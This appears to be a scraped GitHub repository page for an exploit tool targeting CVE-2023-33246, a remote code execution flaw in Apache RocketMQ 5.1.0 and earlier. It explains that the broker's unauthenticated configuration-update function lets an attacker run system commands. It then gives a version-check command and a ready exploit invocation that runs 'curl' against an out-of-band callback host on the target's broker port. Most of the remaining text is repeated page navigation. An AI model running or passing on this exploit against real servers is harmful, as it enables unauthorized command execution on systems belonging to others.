CVE-2023-33246_RocketMQ_RCE_EXP

CVE-2023-33246 RocketMQ Remote Code Execution Exploit

Overview

RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.

Detect RocketMQ version to identify vulnerabilities

usage examples

check

./RocketMQRceCheck -host 127.0.0.1 -port 9876

exploit

RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2023-33246_RocketMQ_RCE_EXP

Overview

Detect RocketMQ version to identify vulnerabilities

usage examples

About

Releases

Packages

MkJos/CVE-2023-33246_RocketMQ_RCE_EXP

Folders and files

Latest commit

History

Repository files navigation

CVE-2023-33246_RocketMQ_RCE_EXP

Overview

Detect RocketMQ version to identify vulnerabilities

usage examples

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages